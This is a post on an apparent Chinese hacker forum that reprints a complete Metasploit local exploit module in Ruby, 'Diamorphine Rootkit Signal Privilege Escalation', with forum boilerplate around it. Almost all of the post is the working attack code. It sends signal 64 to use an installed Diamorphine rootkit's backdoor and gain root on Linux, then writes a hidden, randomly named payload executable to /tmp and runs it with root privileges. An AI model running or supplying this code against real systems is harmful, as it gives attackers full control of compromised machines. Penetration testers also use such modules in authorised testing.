• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Diamorphine Rootkit信号特权升级漏洞


This Wind

Recommended Posts

发布内容作者:0hack                                            漏洞危害等级:critlow_3.gif〔高〕

 

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
 
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Diamorphine Rootkit Signal Privilege Escalation',
      'Description'    => %q{
        This module uses Diamorphine rootkit's privesc feature using signal
        64 to elevate the privileges of arbitrary processes to UID 0 (root).
 
        This module has been tested successfully with Diamorphine from `master`
        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'm0nad', # Diamorphine
          'bcoles' # Metasploit
        ],
      'DisclosureDate' => '2013-11-07', # Diamorphine first public commit
      'References'     =>
        [
          ['URL', 'https://github.com/m0nad/Diamorphine']
        ],
      'Platform'       => ['linux'],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'Notes'          =>
        {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'DefaultTarget'  => 0))
    register_options [
      OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end
 
  def signal
    datastore['SIGNAL'].to_s
  end
 
  def base_dir
    datastore['WritableDir'].to_s
  end
 
  def upload_and_chmodx(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    write_file path, data
    chmod path, 0755
  end
 
  def cmd_exec_elevated(cmd)
    vprint_status "Executing #{cmd} ..."
    res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s
    vprint_line res unless res.blank?
    res
  end
 
  def check
    res = cmd_exec_elevated 'id'
 
    if res.include?('invalid signal')
      return CheckCode::Safe("Signal '#{signal}' is invalid")
    end
 
    unless res.include?('uid=0')
      return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'")
    end
 
    CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.")
  end
 
  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end
 
    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end
 
    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end
 
    payload_name = ".#{rand_text_alphanumeric 8..12}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe
    register_file_for_cleanup payload_path
 
    cmd_exec_elevated "#{payload_path} & echo "
  end
end

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now